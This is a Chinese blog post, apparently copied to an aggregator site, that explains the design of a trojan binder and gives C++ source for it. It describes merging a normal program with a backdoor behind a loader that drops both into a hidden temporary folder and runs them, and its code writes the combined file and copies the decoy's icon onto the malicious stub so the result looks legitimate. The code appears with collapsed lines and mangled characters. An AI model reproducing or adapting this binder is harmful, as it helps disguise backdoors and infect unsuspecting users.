木馬捆綁是把一個(gè)有界面的正常程序，和一個(gè)后門(mén)程序捆綁在一起從而制作一個(gè)木馬。
木馬捆綁器一般是三個(gè)程序和在一起，程序1：正常程序，程序2：后門(mén)程序，程序3：
一個(gè)加載。這個(gè)加載器的作用就是包容、釋放、加載這前面兩個(gè)個(gè)程序，
MZ********************************
**********************************
********************************** <------加載程序
**********************************
**********************************
----------------------------------
**********************************
**********************************
********************************** <------正常程序
**********************************
**********************************
----------------------------------
**********************************
********************************** <------木馬程序
**********************************


這個(gè)程序加載的時(shí)候先把下邊兩個(gè)程序釋放的一個(gè)臨時(shí)目錄（一般最好不讓別人看見(jiàn)）
然后運(yùn)行這兩個(gè)程序。木馬就可以正常加載了。

看看局部代碼，主要有用的就是圖標(biāo)修改

void CExeBinderDlg::OnButton4() //開(kāi)始捆綁 { CString strInfectFilename; m_Edit1.GetWindowText(strInfectFilename); //讀出原始文件內(nèi)容 CFile InfectFile(strInfectFilename,CFile::modeRead|CFile::shareDenyNone);//得到原始文件長(zhǎng)度 DWORD dwInfectFileLength=InfectFile.GetLength(); //分配緩沖區(qū) BYTE* pbyInfectFile=new BYTE[dwInfectFileLength];//讀出原始文件內(nèi)容 InfectFile.Read(pbyInfectFile,dwInfectFileLength); strInfectFilename=InfectFile.GetFileName(); InfectFile.Close(); / CString strInfectFilename1; m_Edit2.GetWindowText(strInfectFilename1); //讀出原始文件內(nèi)容 CFile InfectFile1(strInfectFilename1,CFile::modeRead|CFile::shareDenyNone);//得到原始文件長(zhǎng)度 DWORD dwInfectFileLength1=InfectFile1.GetLength(); //分配緩沖區(qū) BYTE* pbyInfectFile1=new BYTE[dwInfectFileLength1];//讀出原始文件內(nèi)容 InfectFile1.Read(pbyInfectFile1,dwInfectFileLength1); strInfectFilename1=InfectFile1.GetFileName(); InfectFile1.Close(); / CString exeFullPath; //用于保存當(dāng)前執(zhí)行程序路徑 GetModuleFileName(NULL,exeFullPath.GetBufferSetLength(MAX_PATH),MAX_PATH); exeFullPath.GetBufferSetLength(exeFullPath.ReverseFind('\\')+1); //找到 exeFullPath.ReleaseBuffer(); CString strVirusFilename=exeFullPath+"SelfRun.bud"; //源文件名CFile VirusFile(strVirusFilename,CFile::modeRead|CFile::shareDenyNone);//得到病毒文件長(zhǎng)度 DWORD dwVirusFileLength=VirusFile.GetLength(); //分配緩沖區(qū) BYTE* pbyVirusFile=new BYTE[dwVirusFileLength];//讀出病毒內(nèi)容 VirusFile.Read(pbyVirusFile,dwVirusFileLength); VirusFile.Close(); / char FileInfo[80]; ZeroMemory(FileInfo,sizeof(FileInfo));memcpy(&FileInfo[0],strInfectFilename.GetBuffer(strInfectFilename.GetLength()),strInfectFilename.GetLength()); memcpy(&FileInfo[32],strInfectFilename1.GetBuffer(strInfectFilename1.GetLength()),strInfectFilename1.GetLength());DWORD dwInfectFilePos=dwVirusFileLength; DWORD dwInfectFilePos1=dwVirusFileLength+dwInfectFileLength;memcpy(&FileInfo[64],&dwInfectFilePos,4); memcpy(&FileInfo[68],&dwInfectFilePos1,4); / //修改病毒文件的圖標(biāo) int nRet=ModifyIcon((char**)&pbyVirusFile,(char*)pbyInfectFile); if(nRet==0)//如果修改圖標(biāo)失敗,就提示一下 { MessageBox("無(wú)法取出執(zhí)行文件1的圖標(biāo)數(shù)據(jù)，捆綁后的文件將使用默認(rèn)圖標(biāo)。","錯(cuò)誤",MB_OK|MB_ICONWARNING); } / CString strTargetFilename; //目標(biāo)文件名 m_Edit3.GetWindowText(strTargetFilename);CFile TargetFile(strTargetFilename,CFile::modeCreate|CFile::modeWrite|CFile::shareDenyNone);//寫(xiě)病毒內(nèi)容 TargetFile.Write(pbyVirusFile,dwVirusFileLength); //寫(xiě)原始文件內(nèi)容 TargetFile.Write(pbyInfectFile,dwInfectFileLength); //寫(xiě)原始文件內(nèi)容 TargetFile.Write(pbyInfectFile1,dwInfectFileLength1); //寫(xiě)病毒配置信息 TargetFile.Write(FileInfo,sizeof(FileInfo)); TargetFile.Close();delete[] pbyInfectFile; delete[] pbyInfectFile1; delete[] pbyVirusFile;MessageBox("捆綁完成。","完成",MB_OK|MB_ICONINFORMATION); }//private// int CExeBinderDlg::ModifyIcon(char **pDesc,char *pSrc)//修改EXE圖標(biāo) { char *pFileA=*pDesc; char *pFileB=pSrc; /**先讀以pSrc的資源***************************************/ IMAGE_DOS_HEADER* dosHeadB=(IMAGE_DOS_HEADER*)pFileB; IMAGE_NT_HEADERS* ntHeadB=(IMAGE_NT_HEADERS*)(pFileB+dosHeadB->e_lfanew); IMAGE_SECTION_HEADER* secHeadB=(IMAGE_SECTION_HEADER*)((char*)ntHeadB+sizeof(IMAGE_NT_HEADERS)); for(int i=0;i<ntHeadB->FileHeader.NumberOfSections;i++,secHeadB++) {if(strcmp((char*)secHeadB->Name,".rsrc")==0){break;} } IMAGE_RESOURCE_DIRECTORY *dirResourceB=(IMAGE_RESOURCE_DIRECTORY *)((char *)pFileB + secHeadB->PointerToRawData); IMAGE_RESOURCE_DIRECTORY_ENTRY *entryResourceB=(IMAGE_RESOURCE_DIRECTORY_ENTRY *)((DWORD)dirResourceB + sizeof (IMAGE_RESOURCE_DIRECTORY)); IMAGE_RESOURCE_DIRECTORY *dirTempB; IMAGE_RESOURCE_DIRECTORY_ENTRY *entryTempB; IMAGE_RESOURCE_DIRECTORY *dirTempICONB; IMAGE_RESOURCE_DIRECTORY_ENTRY *entryTempICONB; IMAGE_RESOURCE_DATA_ENTRY *entryDataB;DWORD dwSrcIconLength=0; char *pSrcIcon;for(int i=0;i<dirResourceB->NumberOfIdEntries;i++,entryResourceB++) { //所有資源if(entryResourceB->Name==3){ //ICONdirTempB=(IMAGE_RESOURCE_DIRECTORY *)((char *)dirResourceB+entryResourceB->OffsetToDirectory);entryTempB=(IMAGE_RESOURCE_DIRECTORY_ENTRY *)((char *)dirTempB+sizeof(IMAGE_RESOURCE_DIRECTORY));for(int k=0;k<dirTempB->NumberOfIdEntries;k++,entryTempB++){ //子目錄if(entryTempB->DataIsDirectory >0){ //還有子目錄dirTempICONB=(IMAGE_RESOURCE_DIRECTORY *)((char *)dirResourceB + entryTempB->OffsetToDirectory );entryTempICONB=(IMAGE_RESOURCE_DIRECTORY_ENTRY *)((char *)dirTempICONB + sizeof(IMAGE_RESOURCE_DIRECTORY));entryDataB=(IMAGE_RESOURCE_DATA_ENTRY *)((char *)dirResourceB + entryTempICONB->OffsetToData );//dwSrcIconLength=entryDataB->Size;pSrcIcon=entryDataB->OffsetToData - secHeadB->VirtualAddress + (char *)dirResourceB;LPDWORD pdwSrcIconSize=(LPDWORD)(pSrcIcon+4);if(*pdwSrcIconSize==32)//找到了32x32的圖標(biāo)就終止查找,否則繼續(xù)找.{break;}//}}} }/**再找到Virus的ICON入口*******************************************************/ IMAGE_DOS_HEADER *dosHeadA=(IMAGE_DOS_HEADER *)pFileA; IMAGE_NT_HEADERS *ntHeadA=(IMAGE_NT_HEADERS *) (pFileA + dosHeadA->e_lfanew); IMAGE_SECTION_HEADER *secHeadA=(IMAGE_SECTION_HEADER *)((char *)ntHeadA+ sizeof(IMAGE_NT_HEADERS)); for(int i=0;i<ntHeadA->FileHeader .NumberOfSections ;i++,secHeadA++){if(strcmp((char *)secHeadA->Name,".rsrc")==0){break;} } IMAGE_RESOURCE_DIRECTORY *dirResourceA=(IMAGE_RESOURCE_DIRECTORY *)((char *)pFileA + secHeadA->PointerToRawData); IMAGE_RESOURCE_DIRECTORY_ENTRY *entryResourceA=(IMAGE_RESOURCE_DIRECTORY_ENTRY *)((DWORD)dirResourceA + sizeof (IMAGE_RESOURCE_DIRECTORY)); IMAGE_RESOURCE_DIRECTORY *dirTemp; IMAGE_RESOURCE_DIRECTORY_ENTRY *entryTemp; IMAGE_RESOURCE_DIRECTORY *dirTempICON; IMAGE_RESOURCE_DIRECTORY_ENTRY *entryTempICON; IMAGE_RESOURCE_DATA_ENTRY *entryData;DWORD dwDescIconLength=0; char *pDescIcon;for(int i=0;i<(dirResourceA->NumberOfIdEntries+dirResourceA->NumberOfNamedEntries);i++,entryResourceA++) { //所有資源if(entryResourceA->Name==3){ //ICONdirTemp=(IMAGE_RESOURCE_DIRECTORY *)((char *)dirResourceA+entryResourceA->OffsetToDirectory);entryTemp=(IMAGE_RESOURCE_DIRECTORY_ENTRY *)((char *)dirTemp+sizeof(IMAGE_RESOURCE_DIRECTORY));for(int k=0;k<(dirTemp->NumberOfIdEntries+dirTemp->NumberOfNamedEntries);k++,entryTemp++){ //子目錄if(entryTemp->DataIsDirectory >0){ //還有子目錄dirTempICON=(IMAGE_RESOURCE_DIRECTORY *)((char *)dirResourceA + entryTemp->OffsetToDirectory );entryTempICON=(IMAGE_RESOURCE_DIRECTORY_ENTRY *)((char *)dirTempICON + sizeof(IMAGE_RESOURCE_DIRECTORY));entryData=(IMAGE_RESOURCE_DATA_ENTRY *)((char *)dirResourceA + entryTempICON->OffsetToData );//pDescIcon=entryData->OffsetToData - secHeadA->VirtualAddress + (char *)dirResourceA;dwDescIconLength=entryData->Size;//}}} }//如果不是"圖標(biāo)大小符合"就返回 if(dwSrcIconLength>dwDescIconLength) {return 0; }//修改EXE圖標(biāo) memcpy(pDescIcon,pSrcIcon,dwSrcIconLength); return 1; }

總結(jié)

以上是生活随笔為你收集整理的木马捆绑器设计思路和源码的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。